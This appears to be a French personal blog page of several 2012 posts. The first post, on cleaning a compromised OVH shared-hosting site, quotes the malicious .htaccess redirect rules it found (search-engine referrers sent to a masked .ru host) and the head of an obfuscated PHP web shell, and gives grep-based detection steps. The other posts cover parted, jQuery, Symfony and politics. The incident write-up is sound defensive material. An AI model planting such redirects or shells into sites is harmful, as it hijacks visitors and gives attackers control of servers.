Bux Blog

Nettoyer un site "vérolé" sur un hébérgement mutualisé ovh

bux — Fri, 24 Feb 2012 12:12:00 +0000

Jusqu'à ce jour je n'es eu a faire face qu'a trois attaque dirigé contre des site sous ma responsabilité. Les deux premières furent sur mangas-tv du temps ou je m'en occupait encore. Ces deux premières attaquent étais dirigé par des hackers et j'ai pu résoudre ces deux problèmes de la même manières: Je suis rentré en contact avec le hacker (annonce sur le site web en question).

J'ai actuellement comme travail la refonte d'un petit site internet (type association foyer rural) afin de remplacer un vieux site statique. J'ai récemment pu découvrir que le vieux site avait permis a des robots de rentrer sur l’hébergement tel un gruyère.

Voilà en gros ce que j'ai pu trouver sur la machine:

Des .htaccess contenant ce genre de choses

ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]

Et des fichiers php avec ce genre de contenu:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]

En gros on constate que des scripts php servant de porte dérobés placent des .htaccess un peu partout pour modifier le comportement du navigateurs des visiteurs. Du moins c'est ma conclusion.

Une des premières choses a faire et d'aller consulter les fichiers journaux (logs) de votre machine. Pour un hébergement mutualisé chez ovh nous avons accès a ces différents logs ici: https://logs.ovh.net/ (identifiez vous avec votre accès OVH).

Premièrement de quel manière l'attaquant entre en contact avec votre machine: FTP ? Je regarde les logs d'accès: il n'y a aucun autre accès que le mien dans les logs. On change tout de même de mot de passe.

Deuxièmement: Les accès http. On fouille dans les requêtes http voir ce que l'on trouve. Dans mon cas ces lignes sont intéressantes:

77.84.28.135 domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"
79.137.237.79 domain.tdl - [23/Feb/2012:00:01:28 +0100] "POST /photos/zp-core/
zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.imagess.php HTTP/1.1" 
200 123 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

On peut trouver de cette manière quel sont les fichiers trojans sur le serveur. Mais ce n'est pas non plus très pratique: Des milliers voir des millions de lignes a lire (ou a exploiter avec des scripts bien sur) et la liste que vous arriverez a faire ne sera pas exhaustive.

Les hébergements "perso" chez ovh ne nous permettent pas de se connecter en ssh a la machine d'hébergement. Ce qui au final est un gros handicap de ne pas pouvoir utiliser la puissance de la ligne de commande. C'est la que ca devient intéressant: Ovh propose un accès WebDav. bingo on peut se monter un répertoire pointant sur le webdav ! (activez votre accès webdav sur l'interface ovh au préalable)

mkdir /mnt/tmp
mount.davfs https://[login].webdav.ovh.net /mnt/tmp

On peut maintenant utiliser la puissance de la ligne de commande sur les fichiers de l'hébergement mutualisé. Ma stratégie a été de rechercher dans tous les fichiers du contenu similaire a celui trouvé dans les fichiers suspects:

grep --color=auto -rn "auth_pass" /mnt/tmp | tee -a /home/bux/tmp/logvirus_a_1 
&& grep --color=auto -rn "RewriteCond" /mnt/tmp | tee -a /home/bux/tmp/logvirus_a_2

| tee -a permet de mettre dans un ffichier le résultat de la commande.

J'ai pu par la suite éplucher le résultat de mes deux commandes et lister les fichiers a supprimer. Pour le moment tout semble tranquille mais je reste au aguets, rien ne dit que je n'est pas raté certains fichiers ...

Redimensionner une partition avec parted

bux — Fri, 24 Feb 2012 10:12:00 +0000

Un iMac G4 a récemment est récemment passé a ma porté. Je l'es tant bien que mal accepté même si son système est propriétaire. Et même si il y a du Unix la dedans j'ai tout de même voulu installer un linux en dual boot.

Premièrement mon choix c'est porté vers ubuntu. Il m'a fallut télécharger la version PPC vu que cette machine est équipé d'un Processeur de type PowerPc (imac < 2005).
Une fois dans la procédure d'installation d'ubuntu il m'a fallut redimensionner la partition principale du disque. Cependant j'ai découvert que le redimensionnement ne peut s'opérer sur les partition de type HFS lors de l'installation d'ubuntu. Il m'a donc fallu trouver un moyen différent de la redimensionner.
J'ai donc télécharger un live cd prévu pour l'architecture PPC: Finnix .
Une fois l'iso gravé et chargé au démarrage du mac (Super+S avec un clavier non mac, sinon c'est Option+S je crois) je démarre la procédure.

J'identifie le nom du disque:

fdisk --list

Dans mon cas ce sera /dev/sda

parted /dev/sda

L'interface de parted se lance
J'identifie le numéro de la partition qui m’intéresse:

print

Pour moi c'est la 5

resize 5
Start ? [360kB]?

Je valide sans rien changer

End [80.0GB]?

Je saisie 40.00GB
La procédure se lance. Dans mon cas une bonne demi-heure. Une fois la procédure terminé j'effectue un petit redémarrage pour contrôler que tout fonctionne correctement sous mac OS X. Tout est ok, reboot et démarrage sur le livecd d'ubuntu PPC puis installation !

Attention: Les pilotes graphiques ne sont pas toujours très fonctionnels. Dans mon cas ubuntu ne démarré même pas son interface graphique. J'ai réussis a avoir des pilotes fonctionnels avec cette distrib' mais ne fonctionnant qu'en mode dégradé.

Une citation pour développeur d'applications

bux — Sat, 18 Feb 2012 16:11:00 +0000

Je lis actuellement "La programmation orienté objet" de Huges Bersini. Au passage c'est un ouvrage très agréable a lire et simple a comprendre (surtout quand on maîtrise déjà la POO).

J'ai remarqué une phrase très sympathique qui m'a rappelé le temps ou je cherchais ma voie dans les langages de programmation:

"Plus l'application à réaliser est complexe et fait intervenir de multiples acteurs en interaction, plus il devient bénéfique de prendre ses distances par rapport aux contraintes imposés par le processeur, pour faire du monde qui nous entoure la principale source d'inspiration."

jQuery live, pensez-y si vous modifiez du contenu dom

bux — Fri, 17 Feb 2012 20:53:00 +0000

En tant que développeur php je gère de temps en temps des projets web seul. C'est a dire que je suis contraint de m'occuper de la partie CSS et Javascript si il y a. Du coup j'utilise jQuery pour me simplifier la tache du Javascript.

Dans cet article une petite info qui peut vous donner un sérieux coups de main, enfin surtout un économie de temps de recherche quand à un problème que nous somme plusieurs a avoir rencontré.

Prenons par exemple le listener click. La ou ça coince (avec la méthodo ci-dessous), c'est que l'ajout du listener (click ou autre) porte sur le dom existant. Si l'on ajoute du dom il faut re-spécifier le listener sur le nouveau contenu.

Exemple:

<ul id="mylist">
  <li class="element"><a href="#" class="clickme">bla1</a></li>
  <li class="element"><a href="#" class="clickme">bla1</a></li>
</ul>

<script>

  $('a.clickme').click(function() 
  { 
    alert('hello); 
  });

  $.getJSON('/url', function(response) {
    // Adding li to ul#mylist
    // ...
  });
  
</script>

Dans l'exemple ci-dessus on considère que l'appel ajax ajoute des éléments a la liste.

Après la modification du dom le listener 'click' n'écoutera pas les click sur les nouveaux a.clickme. Ce qui est en fait tout a fait logique puisque ces éléments n'existait pas lors de la mise en place de $('a.clickme').click.

Pour cela il faut utiliser live car ce listener prendra en compte les nouveaux éléments du dom :

$('a.clickme').live("click", function(){
  alert('hello); 
});

Stallman avait malheureusement raison depuis le début

bux — Fri, 17 Feb 2012 13:00:00 +0000

Citation de l'article:
"Le cauchemar paranoïaque et apocalyptique d’un geek psychorigide est en passe de devenir réalité.

Trente ans, trente ans que Stallman et la Free Software Foundation répètent inlassablement qu’il est fondamental que ce soit l’homme qui contrôle le logiciel, et donc la machine, et non l’inverse."

Je vous invite a lire la suite sur le Framablog:

http://www.framablog.org/index.php/post/2012/01/04/stallman-avait-raison

Fichez les tous !

bux — Sat, 04 Feb 2012 16:44:00 +0000

Je ne fait même pas de commentaires ...

Ce mercredi, dans une relative discrétion, l'Assemblée nationale a adopté un texte permettant de ficher la quasi totalité de la population française. Dénommé "Fichier des gens honnêtes", il contiendra les données privées de 60 millions de personnes. Un tel fichier a déjà existé dans l'histoire. En 1940. Il a été détruit à la Libération en raison des risques majeurs qu'il représentait pour les libertés publiques.

http://owni.fr/2012/02/01/fichez-les-tous/

Les réacteurs au thorium

bux — Thu, 05 Jan 2012 20:33:00 +0000

Cela fait quelques temps que l'on entends parler des réacteurs nucléaires au thorium. Enfin, pas vraiment quelques temps. La technologie est connu et fonctionnelle depuis 50 ans et les chercheurs, associations et autres essaye de se faire entendre depuis presque autant d'années.

Alors pourquoi nos gouvernements d'époque ont-il choisis de continuer dans le nucléaire à d'uranium plutôt que vers le thorium ? Il semble clair que l'association de l’intérêt militaire a celui de l’énergie n'a pas été négligé. Une industrie d'enrichissement d'uranium (AREVA par exemple) servant autant aux centrales qu'au secteur industriel pour faire des bombes et des munitions a uranium appauvris ca joue dans la balance ...

Et aujourd'hui ? Renouveler le parc industriel représente un investissement énorme, ajoutons a cela les lobbys du nucléaire qui ne veulent pas perdre leurs marché le tout avec un gouvernement qui mange dans la main des grand de l'industrie et de tout ce qui a du pognon ça nous donne le second secteur nucléaire mondial.

Symfony2: Connaitre l'environnement dans twig

bux — Thu, 29 Dec 2011 11:00:00 +0000

Il est parfois utilise d'influencer votre template en fonction de l'environnement en cours. Dans mon cas, j'utilise un script javascript afin de gérer une liste de tags sur l'un de mes projets. Le principe du script est d'ajouter dans le dom une checkbox coché (et caché) identifiant le tag choisis.
Ce qui pose problème lorsque vous souhaitez tester votre formulaire car la manipulation du formulaire nécéssite a priori la présence des champs dans le dom:

$form['element_search_form[tags]['.$hardtek_id.']'] = $hardtek_id;
$form['element_search_form[tags]['.$tribe_id.']']   = $tribe_id;

Or dans mon cas ces cases a cocher n'existe pas dans le dom. Une des solutions est donc d'afficher ces cases a cocher lorsque nous somme en environnement de test:

  {% if  app.environment != 'test' %}    
    [...]
  {% else %}    
    {{ form_row(form.tags) }}  
  {% endif %}